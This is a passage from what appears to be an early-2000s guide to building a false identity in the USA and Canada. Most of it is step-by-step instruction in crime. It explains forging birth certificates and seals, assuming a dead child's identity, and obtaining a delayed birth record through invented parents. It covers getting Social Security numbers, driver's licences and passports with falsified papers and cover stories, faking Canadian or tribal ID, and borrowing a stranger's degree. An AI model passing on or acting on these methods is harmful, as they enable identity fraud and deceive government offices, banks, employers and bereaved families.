of birth and also the date of birth. This is because it seems likely that in many states, the number on the certificate is coded to include a reference to these indicators, so changing any of them is likely to question the authenticity of the certificate. A county birth certificate is a more feasible alternative. They differ greatly in appearance from one county to another, and though it will have a birth number on it, this is issued locally by the county records office and is therefore more difficult for the administration to verify (they would have to go to the trouble of actually contacting the records office). Another bonus is that it is easier to get hold of copies of county issued birth certificates (they are generally more obliging in supplying them - see (A)(b) Requesting a copy of a birth certificate). The actual process of reproducing a county certificate is not difficult. Decide where you would like to be "born" (remember it's usually preferable to have a birth certificate from a different location from where you intend to settle so that when you need to produce your certificate as ID, local clerks won't be familiar with the appearance of it). You will then need to visit the area to look in some old editions of the local newspaper in the town library to pick out a name or names in the "birth" column. Anyone will do, just as long as the period is correct (eg 40 years ago if you are 40 years of age) - take as many details as possible (location of birth, date, parents names, etc). You need enough information to enable you to write off to the records office to request a copy of the certificate. Once you have a copy you can then get to work to reproduce it and create your own fake certificate with your details on it. Scan it into a computer and remove the details of the actual person, and insert your own details. You may have to purchase the correct type of paper from a specialist stationary store. The trickiest part is reproducing the certification stamp and seal (this is where the paper has been squeezed in a small vice-like instrument to produce a raised area of paper like a large coin). Examine the seal on the original copy - it probably won't be very clear, but it will probably have the seal of the county or city encircled by some lettering saying "City of Dudesville" or "Dude County Recorder's Office", etc. Fake certificates ordered from fake ID companies will generally have some kind of seal on them, but often it's not appropriate to the document and may be easily seen as a fake by a clerk examining it. The good news is that it is possible to purchase seals from office supply companies (they are needed for legitimate reasons by notaries, corporations, etc) and also from some mail order ID companies, although you may have difficulty in getting one with the correct wording around it (it's illegal to reproduce the seals of actual agencies). Finally, of course, it doesn't matter that your certificate looks new because it's supposed to be a newly certified copy of your original certificate (which has got lost). A hospital birth certificate is definitely worthy of consideration. As mentioned, these are accepted by the administration as being valid and they have the advantage of being difficult (or impossible if the hospital has since closed down) to verify or disprove. The method of reproducing one would be similar as described above for a county certificate (with the exception that the document would have to be "aged" to make it look old). The only real difficulty here lies in getting hold of an old certificate to see what one actually looks like - it is not possible to order a copy in the same way as it is with county and state certificates. This is where I suggest you may have to become interested in genealogy (researching your ancestors). This gives you a legitimate reason to be interested in birth certificates - there are numerous clubs, books, societies, and web sites. After a few days research you should be more knowledgeable on the subject. A baptismal certificate is probably a less satisfactory option because it is not as "official" as a hospital certificate and may not be so readily recognized as ID by the administration. However, it does have the advantage of being easily reproduced because it is possible to buy blank certificates from clerical supply stores. Again, like the hospital certificate, it would need to be "aged". This is not difficult. Some people stain them with tea to give a brown appearance, although this isn't always a good idea because it may make the document smell and sometimes clerks are wise to this. It's probably just as easy to leave it out in the sun to give it a faded appearance, and the fold it up and put it in a shoe you are wearing. This will give it a nice soft, folded feel, with worn edges. (2) Borrowing the identity of a deceased child This is a clever idea borrowed from a work of fiction ("The Day of the Jackal" by Frederick Forsyth). The basic concept is very simple - you search newspaper news or obituary columns (or cemeteries) to locate a child who was born about the same time as yourself, but who unfortunately died young. The child's birth would have been officially recorded and a birth certificate issued, but then nothing. At the time of the child's death a death certificate would have been issued, but it is only in recent times that any form of cross-referencing has taken place with birth and death records (eg since 1979 in Wisconsin, cross-referencing has taken place so that birth certificates from 1979 onwards are marked "deceased" if the person dies). So what we have with a deceased child is a completely virgin, unused, verifiable identity. The concept is to locate a suitable child, request a copy of his/hers birth certificate, and then you become that person. The only proviso being that its probably better to choose a child from a different state in which you intend to settle to make it less likely that you'll ever run into anyone from the deceased's family (because remember you'll have the same name and birth day as the deceased). Foolproof, eh? Not quite. There's a very obvious problem. How do you know that someone else before you hasn't had the same idea and already used the identity? The first you'll know about it is when you have the police or FBI knocking on your door, wanting to know why you are requesting a drivers license or social security number for someone that's already got one. Now you could think to yourself, I'll do some research on an identity before I go ahead and use it. You could check phone listings across the country or get a private detective or information broker to check if anyone is using a particular name (they can get access to social security, drivers license records, etc that the general public can't). They may come back to you and say that there appears to be no one in the US with that name and date of birth, so you could think to yourself that it's safe to go ahead and use the identity. But wait a minute - the really scary thing is that someone may use the same identity in the future! You've got no control over that and you'll have no warning if it happens! This method will ultimately disappear in time anyway. The IRS has recently commenced a policy of issuing social security numbers to infants (its actually connected with their parents being able to claim tax credits) - this means that should the child subsequently die this will be entered in the social security death index. Anyone subsequently trying to use that identity would therefore find it impossible to get a social security number, thus making it very difficult for anyone trying to live a normal life in the US. (3) Delayed record of birth This is an interesting idea which, although it may require a considerable amount of research and preparation, could produce worthwhile results. The concept here is that you provide the administration with enough evidence to convince them that your birth wasn't officially recorded at the time (not uncommon, see (A)(c) Does everyone have a birth certificate?). The procedure is as follows. First, find a couple that were married but are now deceased. Do this by looking at family graves in cemeteries, and when you find a couple who could conceivably have been the right age to have been your parents, find any information you can from the cemetery office (family details, wife's maiden name, and where they died, etc). With this information you can always go to the nearest library and look in the obituary columns for additional information. With this knowledge you can now contact the records office for the state or county where your "parents" lived, requesting a copy of your birth certificate, supplying your "parents" surname, plus any first names you have chosen and a new birthday (if you think at any stage people might come looking for you its probably wise not to use your actual birthday). They will of course write back informing you that there is no record of your birth, but they should also enclose an application for a "delayed record of birth". Together with your completed application form, you will be expected to provide some proof of your identity in the form of documentation. This proof will vary from state to state or county to county. This is where your research and preparation is needed. You will have to previously have organized some proofs of ID, eg using a fake birth certificate in your new name to get a real drivers license or state ID card, etc. If all goes well you should be supplied with a copy of your birth certificate, and more importantly, your "birth" will be officially recorded and verifiable, with no danger that it can be challenged at any time in the future. Conclusion. You've read these different methods, so which do you think are the best options? It probably depends on what you require the new ID actually for. Basically, the more verifiable the birth certificate, the more doors it will open for you. If you are thinking of getting a social security number (which you will almost certainly need if you intend to live permanently in the US under the new identity, unless you intend to permanently exist in the black economy and not even have a bank account) or a passport, you can forget about using a poor quality fake or a baptismal certificate. In brief, a delayed issued birth certificate is the best, but it also requires the most work. Second best is probably a hospital birth certificate - it isn't actually verifiable, but on the other hand it's virtually impossible to disprove and is generally accepted by the administration. Finally, a fake copy of a county certificate may suffice if it looks authentic and is always presented with other supporting documentation, the only disadvantage being it is potentially not verifiable if a clerk decides to check by contacting the county records office. We'll cover the requirements in the next sections for drivers licenses and social security numbers, which should be the next documents you acquire. (B) Social Security Number (a) Do I need one? (b) How do I get one? (a) Do I need a social security number? Getting a social security card will not be easy, even if you have a verifiable birth certificate. But if you intend to live permanently in the US it's really a necessity - you need to give your employer your number, a bank will request your number when you try to open an account, utility companies will request the number if you require their services, since 1996 applicants for professional licenses, commercial drivers licenses, occupational licenses and marriage licenses are required to give their number, and so on. Most states now require your number before issuing a drivers license (except for people who genuinely haven't got a number and aren't entitled to one, eg people not authorized to work in the US). The social security number has become a standard means of tracing people used by both government and private organizations. You hear of people buying fake social security cards, but this isn't a long term viable option - give a false number to your employer and the government computer will spit it back out within a few weeks. Since September 11th, businesses that employ large numbers of immigrant workers are stepping up efforts to identify and dismiss employees without proper work documentation. Currently, out of the six and a half million businesses that report to the Social Security Administration, the SSA sends out about 110,000 notices a year to workers with incorrect SSN's. Giving a false number to a bank (to open a bank account) doesn't currently appear to be a problem. If you look at cases of identity theft, in many cases the fraudsters open accounts in the names of legitimate people, but give phony SSN's. Life without a valid number is only really possible if you have independent means (maybe in off-shore accounts) or you work in the black economy, or maybe you're not a US citizen and you need to spend more time in the US than your visitors visa would allow. (b) How do I get a social security number? This is the tricky part. The easiest way to apply is by post - you just send in the appropriate form with whatever proof of ID they request, and you get back in the post your social security number. The difficulty is that this method is only open to children and teenagers - anyone over the age of eighteen has to apply in person. But don't completely rule out this method - apparently it is feasible to apply as a child by sending in an altered version of your birth certificate, changing your birthday, the ages of your "parents", etc. You will receive back a social security number, the only drawback being that your age will be wrong on the system. This is not an immediate problem because your age or date of birth does not appear on your social security card, but it will mean you will not be able to work until the system believes you have reached working age - the administration will not be expecting tax returns from fourteen year olds. If you intend to take the other route and apply as an adult you will need a convincing story why you do not already have a number. Your options are rather limited - you can always say you have lived abroad since leaving college, or been in a mental asylum! You'll have to give some thought to this. The clerk interviewing you is naturally going to be suspicious of maybe someone in their thirties or forties claiming never to have had a social security number. However, before you become too disheartened remember that over five million numbers are issued every year, that's a hundred thousand a week! The administration isn't going to spend hours researching your application. A recent audit of SSN applications noted that out of 3,557 applications, 999 of them had submitted "improper documentation" and yet still been approved for SSN's. Again it's all down to preparation and research. Plus, it is also worth noting that at the moment there is no link between the Social Security Administration and the Immigration and Naturalization Service to check the validity of immigration documentation or visas that are submitted by non-citizens with their applications. Do it right and you should get through. Its worth visiting the Social Security Administrations site on the web (see "Links" at the very end) - there's a wealth of information here, also including an explanation of how the nine digit number is made up (the number contains information showing when and where it was issued - basically the first 3 digits indicate where the number was issued, the next 2 digits when issued, and the last 4 digits are issued consecutively). (C) Drivers License A drivers license is really essential - it's the standard form of photo ID. For example, some hotels and motels won't now accept a credit card unless it's backed up by a photo ID. For everyday purposes like this a fake license would suffice, particularly from a state different to the one you're living in (all states issue their own license and they all differ in appearance). If you intend to drive you need a drivers license. But if you get stopped by the police and you show them a fake license, no matter how authentic it looks they will verify it on-line and you will be in big trouble. So, how do you get a drivers license? You will need to apply in the state in which you are resident, and as well as taking a driving test you will need to supply them with a whole load of information, the point being the license is regarded as being a proof of ID. The motor vehicle department in most states contains the following information: - Full name - Date of birth - Home address - Telephone number - Marital status - Height and weight - Eye and hair color - Medical data - Social security number (now required by most states) Plus, your file will also contain details of the documents used to apply for the license It used to be possible to get a real drivers license by taking in a fake license from another state, and asking to exchange it for one from that state. However, a recent development is the NDR (National Drivers Register) - states can now do an on-line check to verify a license, the purpose being to stop drivers who have had their license suspended in one state applying for a license in another state. But if you've got a birth certificate and some supporting documentation, there is no reason why you should not get a drivers license. The documentation you need to supply will vary from state to state, and you may need to supply some secondary documentation (see the next section "Secondary Identification"), but this should not be a problem, and maybe a proof of residency (for example a utility bill or letter from the IRS or your bank). What if you haven't got a social security number? This isn't an insoluble problem. You may be able to get away with giving them a fake number, dependent on which state you are in. Currently fifteen states do instant on-line verification, so they will check your number whilst you're actually at the DMV office applying for your license. Thirty-two states do not check at all. California checks in batches (it's cheaper that way) so you'll get a temporary license in California if you give an incorrect social security number, but you'll never get your permanent license. Check out this website -it's got some very interesting info on the information different states require when issuing drivers licenses, although I would recommend you check any of this information to see whether or not it's still current. www.networkusa.org/fingerprint/page4/fp-04-page4-winners-losers.html As mentioned in the section on social security numbers, it is actually possible in some states to get a drivers license without having a social security number - if a drivers license applicant does not have an SSN, in Florida for example, he will be referred to the local Social Security Administration Office where he will be assessed. If the applicant does not meet the requirements to be issued with a SSN (eg not authorized to work in the US), then he will be issued with a notice explaining this, which the DMV will accept as proof that the applicant does not have or require a SSN. After September 11th, there was controversy about the practice of the four states of Tennessee, North Carolina, Utah and Virginia in issuing drivers licenses to illegal aliens. They were issuing licenses to people without SSN's and proper documentation (often accepting almost anything as proof of residence). The theory behind this was that these states didn't want thousands of untested, uninsured and unlicensed drivers on their roads. They knew it was a controversial move, because giving licenses to illegal immigrants was giving them valid US ID. Since September 11th there has been some tightening up of requirements to obtain a license. It's probably worth visiting the websites of these four states to see what their current requirements are for issuing a license: Utah - www.driverlicense.utah.gov If you have no SSN they will accept an ITIN - this is an "Individual Taxpayer Identification Number" issued by the IRS. North Carolina - www.dmv.dot.state.nc.us/driverlicense/ Same as Utah now - no SSN means you'll need an ITIN. When it became known that the state was issuing licenses to illegal aliens, it was flooded with applicants. According to the DMV, an estimated 400,000 licenses have been issued by the state since 1997 to people without an SSN. Virginia - www.dmv.state.va.us If you do not have an SSN (or you do not wish your SSN to be displayed on you license) Virginia will issue an alternative number. Tennessee - www.state.tn.us/safety/listinfo.htm and see also page for SSN rules www.state.tn.us/safety/dl/ssn.htm You need to sign an affidavit to confirm that you've never had an SSN. In addition, it's also worth checking out the current ID requirements for the more rural states with smaller populations. These states are going to have the least problems with illegal immigrants, crime, identity thefts, etc, so that they will have the fewest measures implemented to deal with them. Also it must be remembered that they don't want to bring in new security measures unless they have to because it costs money, which has to come out of their existing budgets. Because the laws of each state change all the time, your only really safe course of action is to visit the DMV web sites of the various states you are considering applying for a license in. The web sites will have an up to date list of their current ID requirements. Finally, when you go for your license the clerks have a habit of taking all your paperwork from you then casually asking you questions about it so ensure that you know all your details, e.g. date of birth. Also, they may well be curious why if maybe you're in your thirties or forties and you haven't already got a drivers license. So, it's wise to have a ready explanation - maybe you've lived in Canada for the last twenty years. I haven't mentioned it before so I'll mention it here. When you're attending any face-to-face interviews, always go respectably dressed. Also try and go at a busy time (e.g. lunchtime) so that they won't be able to spend too long with you. It's also wise not to carry anything that shows your real identity, just in case they start to get suspicious and try to detain you (these places usually have security guards). (D). Passport This is really the final document in the chain of documents you can get. You may not necessarily need a passport - if you don't intend travelling outside the US, Canada or Mexico, you won't need one. If you do need a passport, then you need a real one - forget about fakes. When travelling through US customs your passport will be scanned by computers to verify it. Like with drivers licenses and social security numbers, thousands of applications are processed every week, so unless you do anything stupid and draw attention to yourself, your application should proceed smoothly. You can either apply at a post office or local courthouse, or at a passport office in a large city. It may be best to avoid applying in cities like New York and Los Angeles because they have a high incidence of fraudulent applications and so are more vigilant in looking for them. The good thing about applying at a local post office or courthouse is that they keep your birth certificate for verification by the State Department and will reply by post to your mail drop, enclosing (hopefully) your birth certificate and new passport - but if it goes wrong, at least they can't trace you any further than the mail box. The bad thing about this method is that your birth certificate is likely to be more closely scrutinized because it will be looked at by people who are used to examining them and are more likely to spot a fake. Applying in person at a passport office may seem like going into the lion's den, but it may be worth considering. They will not keep your birth certificate for verification, it will be looked at there and then, and presuming all is well your passport will follow shortly after in the post. The very fact that they don't keep your birth certificate shows that they don't actually crosscheck it with the actual records office in the state or county where it was issued. However, it does appear that they can do some sort of simple verification on the actual state birth number on state issued birth certificates (see (A)(d)(1) "Producing a fake birth certificate"). How they verify county issued certificates with locally issued numbers, or hospital certificates is open to question. Presumably, it depends on the amount of supporting documentation, the actual appearance of the birth certificate (whether it looks authentic or not) and the demeanor/appearance of the applicant. Looking at it logically, they aren't going to verify every birth certificate at source. It just wouldn't be possible- the issuing of birth certificates is too decentralized, and trying to verify them would create an enormous backlog in the system. Of course, you will have none of these worries about your birth certificate if it's a real one procured by the delayed record of birth method (see (A)(d)(3) Delayed record of birth). Providing your supporting documentation is adequate, getting a passport should be easy. The only proviso with all of this is that it might look strange if all your supporting documentation is all recently issued - the clerk dealing with you might find this suspicious. SECONDARY IDENTIFICATION (USA) 1. State ID card. 2. Library card. 3. Miscellaneous ID. 1. State ID Card This is a form of photo ID carried by people who don't have a drivers license (maybe they are elderly and don't drive, or maybe there are medical reasons for them not driving). If you haven't yet got a drivers license this is a useful thing to have because it has as the same official status as a drivers license, but is usually easier to get. They are usually available via the county courthouse and take two weeks to come through. Because the clerks (unlike at the drivers license bureau) aren't having to look for suspended drivers trying to get a license in another state, they are usually less rigorous. 2. Library Card Not a photo ID, but still useful to have. Most libraries request two forms of ID. Usually one can be your birth certificate, and the other one may be something simple like letters addressed to you. Again, this usually takes two weeks to come through. 3. Miscellaneous You can always enroll yourself on a short course at a local college and get yourself a student card. You can print yourself some business cards on your computer - as for an address and phone number on your cards, see "Establishing a Mailing Address". You can order yourself a fake employee ID card from a mail order ID company. Voter registration cards are often not difficult to get - clerks will often give you a blank one to fill out, and you just need to stamp it to make it look official (you can order stamps from mail-order ID companies or from office equipment suppliers). Or what about Native American tribal ID? You don't have to look like a tribal member (you are often entitled to this status even if you only have a single great grand-parent who was a native). These native ID's are usually very unsophisticated in appearance, and not difficult to reproduce on a computer. Plus, they have the great advantage of being very difficult to verify (particularly from a distant state) and clerks do not like to question them for fear of being accused of racism. You can join clubs, societies or unions and get their membership cards. The basic rules with any of theses secondary ID's is that they add to the credibility of your new identity, particularly when used selectively. What I mean is always try to use them in situations where they cannot be verified. Never use a fake document in any dealings with the actual agency that is supposed to have issued it - always use it with other agencies, preferably in other states. Bank Accounts and Credit Cards Before opening an account, most banks check the name, address and SSN with a company called ChexSystem. This company has a database of people whose accounts have been terminated for fraud or chronic insufficient funds during the past five years. ChexSystems are covered by the Fair Credit Reporting Act, and the bank is required to let you know if it refuses to open an account for you and a report from ChexSystems was a factor. You will need some basic identification to open an account - social security number, state ID card or drivers license, etc (banks are very aware of fraudsters, money launderers, etc, so they like to satisfy them about your identity). You may get away with giving them a fake social security number as long as no one else is using that number (they will check you nationwide with a credit reference bureau), although you could of course run into problems in the future if the real owner of that number tries to open an account in the future. Be aware also when giving fake numbers that computer programs exist to verify whether or not a number could have been potentially issued (numbers aren't randomly issued, they come from specific batches for each state). If providing a social security number is going to cause you a problem, why not open an account as a foreigner, e.g. a Canadian. Tell them you have just arrived in the states to work or study. They will still need some ID from you, but it shouldn't be beyond your ability to come up with some fake Canadian ID, which of course the bank won't be able to verify or disprove because it's from another country. Regarding credit cards, if you have a new identity, you won't have any credit history so you won't be able to apply for a conventional credit card. However, a recent innovation is the secured credit card - this is a Visa or MasterCard, where your credit limit is secured by a deposit you must maintain in your bank account. The deposit can be anything from a few hundred dollars to several thousand if you want a gold card. Once the card is issued to you, you can spend anything up to the agreed amount - there is no risk to the bank because you are only spending your own money. The amount of the security deposit normally varies between 125% and 150% of the credit line requested. Make sure that you compare the annual fees and fees for cash withdrawals, etc - unfortunately, these cards usually have higher costs involved than a normal unsecured card. There are numerous such cards on offer in the US, normally however with the stipulation that you must be a US resident and have a SSN number (this is for cards offered by US financial institutions). If you want a card without any such requirements, go for an offshore card. It will still be a US dollar card, but from a bank in a tax haven. They require the minimum personal information from you. You can do a search on the net for them, but be careful not to be taken in by any scam sites. There are web sites that appear to offer off-shore cards but in reality they are just multi-level marketing scams - send in $200 to join the scheme, then recruit others who also pay $200, some of which money goes into your account, and when you reach $1000 in the account you will be issued with your credit card... except of course you never get a card because it's a scam. There are a couple of cards that I've come across that appear to be okay: www.axxess-international.com www.horizoncard.tc CHANGING YOUR NAME (USA) It may be that you have created a new identity, but it isn't in the name you ultimately wish to use. The answer is to change your name - it's legal and it's not difficult. There are two ways to do it: The Common Law method. This doesn't actually involve any legal process. You simply need to provide proof that you are generally known by a name other than your legal name, the proof being such commonplace things as correspondence, invoices, etc. The Court method. By filing a petition with a court to change your name. There are good and bad points to each method. The court method creates a cast iron identity, easily verifiable. However, it does create a trail, which could be followed if you are being pursued. You don't have to do the name change in the state in which you intend to settle, in fact it may be preferable to do it in another state if you don't want to draw any attention to yourself (although you will need to show proof that you are actually resident in that state, which may involve renting a cheap room there). Once your new name is legal, you can then proceed to have your existing documentation amended (drivers license, social security card, etc). Whilst on the subject of names, it may be worthwhile here mentioning something to give you a little food for thought. If you are trying to escape an old life and wish to create a new identity, you will probably have to think about getting a job and earning a living. How are you going to do this? Won't you need qualifications? Why not give yourself some qualifications? You could of course buy yourself a fake diploma, but it's not verifiable if an employer ever tries to check it out. What you really need is a proper college degree. Easy! Colleges and universities keep records open to the public of who graduated, and when they graduated and with what degree. Just choose a suitable person with a commonplace name and borrow their name and degree. I am not suggesting you borrow their whole identity - you'll have a different birth date, social security number and so on, but you will have a verifiable educational history. You aren't running much of a risk - thousands of people in the US share the same names, and some of those with the same names will have similar college degrees. CAN I BE TRACED IN MY NEW IDENTITY? (USA) What information do employers require from me? Under the Employer Sanctions law, employers are required to check the documents of all workers that are hired, to confirm both the identity of the employee and that also he is entitled to work. Documents that prove both identity and entitlement to work are: List A 1. US passport 2. Green card (INS Form I-551) 3. Unexpired Employment Authorization Card (INS Form I-688A) 4. Unexpired Employment Authorization Document with photograph (INS Form I-688B) 5. Unexpired Temporary Resident Card (INS Form I-688) 6. Unexpired Reentry Permit (INS Form I-327) 7. Unexpired Refugee Travel Document (INS Form I-571) Documents that only prove identity are: List B 1. ID card (can be state, federal or local government) 2. Drivers license 3. Voters registration card 4. School ID card with a photograph 5. Canadian drivers license 6. Native American tribal document 7. US military card or draft record 8. Military dependents ID card 9. US coastguard merchant mariner card Documents that only prove authority to work are: List C 1. US social security card (does not include cards that state on them "Not for employment purposes") 2. US citizen ID card (INS Form I-97) 3. ID card for use of Resident Citizen in the United States (INS Form I-179) 4. Unexpired Employment Authorization document issued by the INS other than those mentioned in the list A 5. Native American tribal document (yes I know this is on both B and C lists, but not on list A which seems peculiar - don't worry about it) Documents that can't be used as proof of identity and authorization to work include, surprisingly: 1. US birth certificate 2. Certificate of US citizenship (INS Form N-560 or 561) 3. Certificate of US Naturalization (INS Form N-550 or 570) Both employee and employer must complete and sign Form I-9, the employee signing that he is authorized to work, and the employer signing to confirm that he has made efforts to establish the employee is authorized to work, although there is no actual requirement for the employer to do any checks to confirm the legitimacy of any documents. For an employer to verify a social security number, he can call a toll free number (1-800-772-6270) and quote the following info: 1. Social security number 2. Last name 3. First name and middle initial 4. Date of birth 5. Sex The employer is not obliged to verify numbers - this is simply a service offered in case there is any doubt over whether or not a number is correct. Can anyone else trace me? If you are concerned that people from your "past" life may be looking for you, it pays to take some simple but obvious precautions. Firstly, don't have any financial transactions linking you and your old life. Don't transfer money between bank accounts because a record is kept, don't pay for things in your new life with credit cards from your old life because it may give an indication of where you are and what you're doing. Secondly, consider your lifestyle - people tend to be creatures of habit. Do you always drive BMW's, or subscribe to particular trade magazines, go to a particular church. If a private detective is looking for you they will find out these sorts of things and use their skills to get information out of any organizations or businesses you may have had contact with. Thirdly, be careful who you talk to about your plans - have you ever mentioned to people that you'd like to live in Florida? It might be better to go somewhere where people wouldn't expect you to go. Plus of course, it's probably a good idea only to phone anyone from your old life from payphones in random locations, just in case anyone is monitoring their phone records. GENERAL VISA INFORMATION (USA) If you're reading this in another country and wondering if you can use any of the information you have read so far, it may be useful for you to have some background information about how, as a foreign citizen, you can legally get into the US, and live and work there. This can be sub- divided into two categories: (A). Entry into the US as an immigrant (B). Entry into the US as a non-immigrant (A). Entry into the US as an immigrant For any kind of permanent residence (compared to a temporary entry visa), you need an immigrant visa, usually called a Green Card. There are many actual categories in which you may qualify for a green card, but they can be summarized as the following: 1. Family based. Being an immediate relative of a US citizen or permanent resident (this category includes children, parents, husbands, wives, brothers and sisters). 2. Employment based. Covers a wide variety of different areas, particularly including skilled or highly qualified workers (usually where it can be proved that no US citizen is available to do the job) and investors (people willing to bring in and invest hundreds of thousands of dollars in the US). 3. Visa lottery. Every year 50,000 or 55,000 green cards are given out in a visa lottery by the US Dept of State (entry to the lottery is not open to everyone - generally speaking it's only open to citizens of under- developed countries, not countries like Britain or Germany, etc). 4. Asylum/refugee status. For people with well founded fears of being persecuted in their own country for reasons of religion, race, politics, etc. You become a US citizen by a process of naturalization, a process administered by the INS (the Immigration and Naturalization Service). Theoretically, when you become a US citizen you are supposed to renounce any other citizenships (meaning you won't have dual nationality). In practice, however, firstly the administration won't know if you retain any other citizenship, and secondly, not all countries recognize you renouncing their citizenship (so you retain it anyway). (B) Entry into the US as a non-immigrant This type of visa does not allow permanent entry to the US. It is what most people entering the US enter with, and it allows them entry for any period from a few hours to several years for vacations, business meetings, study, temporary work, etc, depending on the type of visa issued. The usual method of obtaining a visa is by applying to a US consulate in your own country. Sometimes you are allowed to mail in an application, although usually you will be asked to attend an interview, the purpose of which is to filter out undesirables or people who might overstay their visa in order to illegally live and work in the US. The exception to this method of obtaining a visa is for citizens of those countries (certain developed countries) which the US has a visa waiver program with. As a business or pleasure visitor, you will be allowed entry into the US for up to 90 days on production of your passport at a US border. This method of entry is still dependent on them being satisfied with your reasons for travelling - you must still have a residence abroad that you have not abandoned, generally a return ticket to get you out of the US, and means to support yourself whilst in the US. Again, it's to stop people over-staying their visas and living and working in the US. If you're from a visa waiver country, don't get paranoid about this. If you arrive on a regular flight and of normal appearance, you'll be asked the reason for your visit and maybe how long you're staying, and that will be it. Your passport will be stamped and you're in. You're likely to get more questions if you're crossing at land borders - not so if you're with your family in a nice rental car crossing from Canada into the US and you're heading for a few days vacation at a resort, but you'll get grief if you're alone, poorly dressed, with hardly any money and no return ticket to your country of origin. Here's the list of non-immigrant visas. It's surprising how many types there are: A-1, 2. and 3. For ambassadors, government officials/employees and associates. B-1. Temporary visitor for business B-2. Temporary visitor for pleasure C-1, 2 and D-1, 2. Transit visas for travelers transiting via the US E-1, 2. For investors and workers of certain countries that have treaties with the US F-1. Students G-1, 2, 3, 4. For workers in international organizations (eg, the UN) H-2A, 2B, 3, 4. For temporary and trainee workers, and spouse and dependents I. International journalist J-1, 2. Exchange visitors (usually students and researchers) and their spouse and dependents K-1, 2. For someone entering the US to marry a US citizen. Although this is a non-immigrant visa you will be interviewed and assessed as though it were for an immigrant visa (to verify both whether your relationship is authentic and whether you will become a "public charge", e.g. a criminal or dependent on welfare) L-1, 2. Intra-company employees and their spouse and dependents (for employees of large international companies) M-1, 2. Technical or vocational school students, and their spouse and dependents N-1. The parent of certain unmarried minors who are special immigrants N-2. The unmarried minor child of an N-1 and the unmarried minor child of certain special immigrants NATO-1 to 7. For NATO staff, their spouses and dependents O-1, 2 and P-1, 2, 3 and 4. For highly talented or internationally recognized athletes, artists, business people, with their spouses and dependents. Q-1, 2. Cultural exchange visitors, their spouses and dependents to come to the US for up to 15 months Q (ii). Irish peace process - for people from Northern Ireland to participate in training courses and programs, etc R-1, 2. For religious workers, their spouses and dependents S-1, 2. For criminal informants, their spouses and dependents TN. For NAFTA (North American Free Trade Agreement) professionals coming to the US to work (this applies to Canadians and Mexicans). If you're looking at this list wondering whether you can utilize any of the above methods to enter and live in the US, I'll try to give you a few pointers. The US administration does actually investigate each individual request for work, study or cultural visas. They will want to see background information on you if you are claiming to be some kind of specialist. If you are being offered a job they will check that the company does exist and wasn't formed just a few days ago. Some ideas for foreign nationals If, for example, you are from a European country and are wondering how you could create a new ID and pass yourself off in the US as a citizen of that country, why not turn your problem to your advantage? It is possible to be a US citizen and still be born and brought up in another country. How? Easy, if one of your parents was a US citizen, lots of people have traveled overseas, then met and married someone abroad. If one of your parents was a US citizen, then you are automatically a US citizen too. The US administration will need to authenticate your claim. You'll need to prepare some documentation for your US parent - probably a copy of a verifiable birth certificate. Or, alternatively, you could claim to have been born in the US and then taken overseas as a child. Again, you would have to verify this claim. Or, here's another idea. Why not try one of the above methods, but also as a backup plan try the same scheme with Canada? If you can get Canadian citizenship it's then easy to enter to the US anyway (you only need a drivers license to cross the border - a passport isn't necessary). You can also work in the US indefinitely if you are a professional with a college degree (or the equivalent) under H-1B or TN visa status. LINKS (USA) Mail-order books on new ID www.paladin-press.com www.edenpress.com www.loompanics.com General resources www.buildfreedom.com/ft/identity.htm Info on new ID www.buildfreedom.com/ft/social_security.htm Info on social security cards www.escapeartist.com Magazine for people living abroad www.lds.org Mormon Church - very useful for genealogical research -------------------------------------------------------------------------------- Government information www.vitalrec.com Contains links to US records www.fedworld.gov Search for Federal Govt info www.state.gov US State Dept (passport info) www.ins.usdoj.gov US Immigration and Naturalization Service (Forms to download. Info on eligibility for immigration) www.dol.gov US Dept of Labor www.ssa.gov US Social Security Admin (informative, good search engine) WHY CANADA? Canada is a very cosmopolitan country, with a great mix of nationalities. Toronto and Vancouver are two of the world's most racially mixed cities. It will not be regarded as being unusual to have a foreign or strange accent. Not only are there a lot of newcomers in Canada, but also many native Canadians have lived abroad (eg studying or working in the US) and they can come back to Canada with, for example, American accents. So, what I'm getting at is that it you, as an outsider, will not stand out in Canada. I should just mention here, for the benefit of those people reading this who are from outside North America, that accents, pronunciations and use of words do vary across the USA and Canada. There are some accents that are obvious to the outsider (eg, New York or the deep south), but there are also much subtler differences. So even though someone from Vancouver (Canada) may sound very similar to someone from Seattle (USA), there would be subtle differences in their speech. One particularly noticeable difference between Canadians and Americans is that Canadians pronounce certain words the same way as English people. The moral of all this, I think, is that if you intend to assume a new identity in Canada, it's going to be a lot easier for you (if you're not actually a native Canadian) to openly admit that you've spent most of your life overseas and not in Canada. The second advantage of Canada is its ease of access to the US. Canadian citizens need only to carry their driver's license to cross the border. There are no visa formalities. It is also possible for Canadians to work in the US, subject to certain formalities. A third advantage that Canada has is its own low cost national medical system. For a monthly payment (about $36 (Cdn) currently) you are covered in Canada for medical treatment. GENERAL PRINCIPLES (CANADA) Much of what was written about the USA applies, in general terms, to Canada. As in the USA the advent of computers has made crosschecking documents much easier, although (similar to the US) this is slightly complicated by the fact that Canada is split into Provinces (as the US is split into states). There has been as yet no attempt to criminalize those attempting to obtain a new identity - there is no specific legislation on this subject, and there is probably unlikely to be so. It's not regarded as an issue requiring attention. Most of the world seems to want to live in the US, not Canada. As in the US, you'll need a mailbox because much of the procedure can be done by post. So, what ID do Canadians have? Birth Certificate. If you're not familiar with Canada, you'll be surprised to find that people carry a credit card sized birth certificate actually on them, and (unlike the USA) these are considered as proper ID (although, of course, they don't carry a photo - they wouldn't, would they, it's a birth certificate). The large paper certificates have not been issued since the early 1960's, when they were replaced by laminated cards, and since the early 1990's cards printed on green bank note type paper. The cards carry the following information: name, date of birth, date of birth registration, birthplace, sex, registration number, and in some provinces a certificate number Those people who are Canadian citizens, but who were born outside of Canada carry a credit card sized Citizenship card (with a photograph). Until the middle of the 1990's birth certificates were issued in Quebec only by the Church - this meant that the authorities had no means of verifying these certificates when they were presented as proof of ID. A recent high profile terrorist case has forced the authorities to act and now these Church birth certificates are not regarded as valid proofs of ID. Social Insurance Card. A wallet sized plastic card with your social insurance number and signature. Carried by everyone and considered (again, unlike the USA) proper ID, because you need to be a legitimate resident to have one. The card is necessary if you wish to gain employment in Canada - any employer will ask for your social insurance number and Revenue Canada will immediately pick up any wrong numbers. However, non-residents are actually allowed to start businesses in Canada (Canada still encourages immigration and investment), although theoretically you are not actually supposed to work in any business you start, although people obviously do. Medical ID card, allowing you free medical treatment across Canada. Drivers License. Obviously you need one if you wish to drive, but it also acts as your photo ID. Those people that don't drive carry a Provincial ID card as their photo ID. FORMS OF ID (CANADA) A. Birth Certificate B. Social Insurance Card 